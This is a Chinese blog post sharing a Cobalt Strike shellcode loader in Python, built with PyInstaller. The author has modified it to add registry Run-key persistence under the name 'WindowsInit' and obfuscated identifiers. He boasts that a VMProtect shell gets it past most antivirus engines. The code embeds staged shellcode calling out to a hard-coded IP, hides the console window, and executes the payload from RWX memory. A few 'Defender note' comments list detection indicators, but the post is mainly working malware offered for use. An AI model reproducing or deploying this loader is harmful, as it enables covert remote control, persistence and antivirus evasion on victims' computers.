
渗透测试神器Cobalt Strike的pyinstaller生成的payload带注册表启动版(混淆编码)

2020-2-19 15:10 作者:酷帥王子 | python网络安全 |

自己把程序改了一下,原始的cs payload没有注册表启动,现在改成注册表启动并且加入混淆编码,貌似windows的def反间谍软件会提示,没关系加个vm正版壳搞掂,免杀过全世界杀毒大部分,只有4个杀毒查杀或提示

from ctypes import *#line:1
import win32con #line:2
import win32api #line:3
import ctypes #line:4
buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\xbb\x01\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x66\x45\x6d\x44\x00\x23\x36\x33\x30\xce\x43\x16\xd3\x55\xdb\xb7\x4b\x66\xdb\x56\x2f\x6d\x2e\xf9\x7e\xf9\xa9\x51\x24\x36\x49\x55\xf2\x47\x38\x70\xdd\x8b\x36\x58\x13\x9b\x4e\xba\x61\x53\xcc\x5c\xe5\x78\x88\x67\xb8\x26\x8e\x20\x42\x7a\x7b\x0f\x9f\x04\x2e\x86\x54\x9d\x2f\x8f\x43\x1f\x0f\x92\x0f\x8a\x31\xb3\x61\x96\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x4e\x50\x30\x36\x29\x0d\x0a\x00\x58\xbf\x3e\x3b\
x89\x1e\x30\xa9\x17\x84\x5c\xf9\x85\xb5\x86\x94\x46\xbe\xc0\x3c\x15\xe8\x4b\xf7\x97\x57\x30\x7e\xb2\x91\x4a\x05\xc0\xd3\x1a\x19\x49\xb5\x71\xcf\x12\x32\xac\x54\x31\xec\x88\x26\xf1\xb3\xf3\x7a\x6f\x98\x52\xdf\x6c\x04\x91\x89\x6c\x8c\x74\xd6\x0e\x56\x4d\x3b\x3f\xb6\x1f\x23\xdc\x8f\x58\x52\x26\x08\x82\x91\x98\xf9\x33\x0e\xfb\x76\xa9\xd4\x36\xab\xdb\xe1\xaa\x79\xe6\x06\xc2\x4b\x10\x4f\x34\xe7\xb9\x94\xdb\xbf\x9d\xe1\xcb\xea\x0a\xbc\x7a\x65\x69\x8f\x6f\x69\xe7\x92\xfb\x1a\x1c\x42\x07\xbf\x7d\x7f\xd8\x03\x8b\x57\xd4\xeb\xaf\x71\xc2\x48\x47\x75\x6d\xe9\x8a\xe1\x42\xeb\x61\x05\xdf\x8e\x4c\x50\x07\xad\x65\x7c\x7c\x51\x1c\x59\x36\x1c\x2f\x0c\x64\x41\x44\xed\x65\x5a\xa2\x99\x1a\x96\xe5\xfa\xdd\x7e\x1f\x1e\x33\x6b\x90\xbb\x69\x11\x5a\x58\xc9\xd2\xc6\x1c\x89\xfa\x2b\x54\xed\xf9\xe2\x5b\x15\xc6\x2c\x6d\x04\x26\x8a\x28\xf4\xe3\x86\x24\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x33\x34\x2e\x31\x37\x35\x2e\x31\x30\x31\x2e\x37\x35\x00\x6f\xaa\x51\xc3"
# POSIX mprotect() protection bits (R=1, W=2, X=4). They are referenced only
# by executable_code below, which nothing in this listing calls.
PROT_READ =1 #line:8
PROT_WRITE =2 #line:9
PROT_EXEC =4 #line:10
def addfile2autorun (O0O00OO0O0O00O0O0 ):#line:11
     """Register the given executable path under the HKCU Run key.

     Opens HKCU Software/Microsoft/Windows/CurrentVersion/Run with
     KEY_SET_VALUE and writes a REG_SZ value named ``WindowsInit`` whose
     data is the path passed in, so the program is launched at user logon.

     Defender note: a Run-key value written by a PyInstaller-built process
     and pointing back at that process's own path is a high-signal
     persistence artifact; registry value-set telemetry on this key (e.g.
     Sysmon event 13) surfaces it, and the value name ``WindowsInit`` is a
     usable indicator for this sample.
     """#line:12
     O0O0O00OOOOOOOO00 ="Software\Microsoft\Windows\CurrentVersion\Run"#line:13
     O0O00O0OO000OOO00 =win32api .RegOpenKeyEx (win32con .HKEY_CURRENT_USER ,O0O0O00OOOOOOOO00 ,0 ,win32con .KEY_SET_VALUE )#line:14
     # Path split whose result is never used afterwards.
     (OOO00OO00O0O0OOOO ,O000O000O0O00OOO0 )=os .path .split (O0O00OO0O0O00O0O0 )#line:15
     win32api .RegSetValueEx (O0O00O0OO000OOO00 ,"WindowsInit",0 ,win32con .REG_SZ ,O0O00OO0O0O00O0O0 )#line:16
     win32api .RegCloseKey (O0O00O0OO000OOO00 )#line:17
# Runs at import time: the script/binary registers its own path (sys.argv[0])
# under the HKCU Run key before any of the loader code below executes.
addfile2autorun (sys .argv [0 ])#line:19
def executable_code (O00000OO00OO000OO ):#line:21
    """Copy a byte string into a page-aligned buffer and mark it RWX (POSIX variant).

    Uses libc valloc()/mprotect() rather than the Win32 API, so this is the
    non-Windows counterpart of the module-level loader below. Nothing in this
    listing calls it; the Win32 VirtualAlloc/VirtualProtect sequence at module
    level is the path that actually runs.

    Returns the c_void_p of the buffer; raises Exception if allocation or the
    mprotect() call fails.
    """
    OOOO00OOOOO0OO00O =c_char_p (O00000OO00OO000OO )#line:22
    OOO0000OOOOO0O00O =len (O00000OO00OO000OO )#line:23
    OOOOO0O00OO000000 =libc .valloc (OOO0000OOOOO0O00O )#line:24
    OOOOO0O00OO000000 =c_void_p (OOOOO0O00OO000000 )#line:25
    if 0 ==OOOOO0O00OO000000 :#line:26
        raise Exception ("Failed to allocate memory")#line:27
    memmove (OOOOO0O00OO000000 ,OOOO00OOOOO0OO00O ,OOO0000OOOOO0O00O )#line:28
    # PROT_READ|PROT_WRITE|PROT_EXEC: the buffer becomes writable and executable at once.
    if 0 !=libc .mprotect (OOOOO0O00OO000000 ,len (O00000OO00OO000OO ),PROT_READ |PROT_WRITE |PROT_EXEC ):#line:29
        raise Exception ("Failed to set protection on buffer")#line:30
    return OOOOO0O00OO000000 #line:31
# Active (Windows) loader path: resolve the kernel32 memory APIs, hide the
# console, allocate an RWX region, copy the shellcode in and jump to it.
VirtualAlloc =ctypes .windll .kernel32 .VirtualAlloc #line:32
VirtualProtect =ctypes .windll .kernel32 .VirtualProtect #line:33
shellcode =bytearray (buf )#line:34
# Hide the process's console window (ShowWindow with nCmdShow=0 is SW_HIDE);
# the `666 ==666` guard is always true.
whnd =ctypes .windll .kernel32 .GetConsoleWindow ()#line:35
if whnd !=0 :#line:36
    if 666 ==666 :#line:37
        ctypes .windll .user32 .ShowWindow (whnd ,0 )#line:38
        ctypes .windll .kernel32 .CloseHandle (whnd )#line:39
# 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: a private
# RWX allocation sized to the payload.
# Defender note: RWX allocation -> memory copy -> call into that region from a
# Python/PyInstaller process is the textbook in-memory shellcode loader
# sequence; memory-scanning and API-sequence detections target exactly this,
# and the Run-key write above supplies the on-disk persistence indicator.
memorywithshell =ctypes .windll .kernel32 .VirtualAlloc (ctypes .c_int (0 ),ctypes .c_int (len (shellcode )),ctypes .c_int (0x3000 ),ctypes .c_int (0x40 ))#line:44
buf =(ctypes .c_char *len (shellcode )).from_buffer (shellcode )#line:45
old =ctypes .c_long (1 )#line:46
# Re-applies PAGE_EXECUTE_READWRITE to the already-RWX region; `old` receives the previous protection.
VirtualProtect (memorywithshell ,ctypes .c_int (len (shellcode )),0x40 ,ctypes .byref (old ))#line:47
# Copy the payload into the allocation, then treat it as a function and call it.
ctypes .windll .kernel32 .RtlMoveMemory (ctypes .c_int (memorywithshell ),buf ,ctypes .c_int (len (shellcode )))#line:50
shell =cast (memorywithshell ,CFUNCTYPE (c_void_p ))#line:51
shell ()#line:53

大不如前了,以前上传的时候只有4个杀毒杀

文章作者:酷帥王子
文章地址:https://www.2k8.org:443/post-139.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!




